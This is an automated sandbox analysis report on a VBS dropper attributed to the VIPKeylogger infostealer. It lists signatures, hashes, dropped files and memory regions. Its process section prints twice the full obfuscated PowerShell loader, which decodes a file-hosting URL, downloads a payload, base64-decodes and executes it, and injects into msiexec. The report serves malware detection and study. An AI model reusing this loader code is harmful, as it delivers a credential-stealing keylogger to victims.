Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-10-2024 01:36

General

  • Target

    982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e.vbs

  • Size

    525KB

  • MD5

    2358bb1bd8cf609df9f1917cf4224194

  • SHA1

    45e0ca20b16c048979d95b59f40475f8fa282e32

  • SHA256

    982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e

  • SHA512

    c2c0e324c07f027edb5e6c34ce368b7d3387fddf6078e5e17c80efa9211381ff58dc27acc22511d0d9f0775b08a43eabfbd7a00061d9f6a3689d3c07a23e9230

  • SSDEEP

    6144:By/7hX57oFbgZQmRmM0rdGqqgLpjDLkB8Gj+xJ9HQ5/vyGVi4dAMuUnhbeDLttD6:kyRgiYgqSjDoB4x7w5XLduIeD53Vgzeg

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2252
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2580

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36M3RUEQT8LLWY5O32G8.temp

    Filesize

    7KB

    MD5

    567d7aab5e225a281dfd8c1dec434407

    SHA1

    83f12e7560f7f5ddcacc6753f73d4b2ea305e07d

    SHA256

    be2e610b00c6c1c55749037747e8b9af781f125a935eaacbe65d6309eb2ff868

    SHA512

    8368aeb277561b68e77e54f6c009187b95f1ba26d3edb9b7e801c198c63a27f0eb304e8b8b19bf6d3d07c04c2efda588655a6f5138b0178c6f045bf547de3b81

  • C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo

    Filesize

    460KB

    MD5

    15d4bf8d1435c92eafc43ebdff22b873

    SHA1

    18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a

    SHA256

    ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce

    SHA512

    463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c

  • memory/2252-8-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-14-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

    Filesize

    4KB

  • memory/2252-4-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

    Filesize

    4KB

  • memory/2252-9-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-10-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-11-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-13-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-7-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-16-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

    Filesize

    32KB

  • memory/2252-5-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2580-21-0x0000000000170000-0x00000000011D2000-memory.dmp

    Filesize

    16.4MB

  • memory/2580-42-0x0000000000170000-0x00000000001B8000-memory.dmp

    Filesize

    288KB

  • memory/2580-41-0x0000000000170000-0x00000000011D2000-memory.dmp

    Filesize

    16.4MB

  • memory/2676-20-0x0000000006860000-0x000000000C028000-memory.dmp

    Filesize

    87.8MB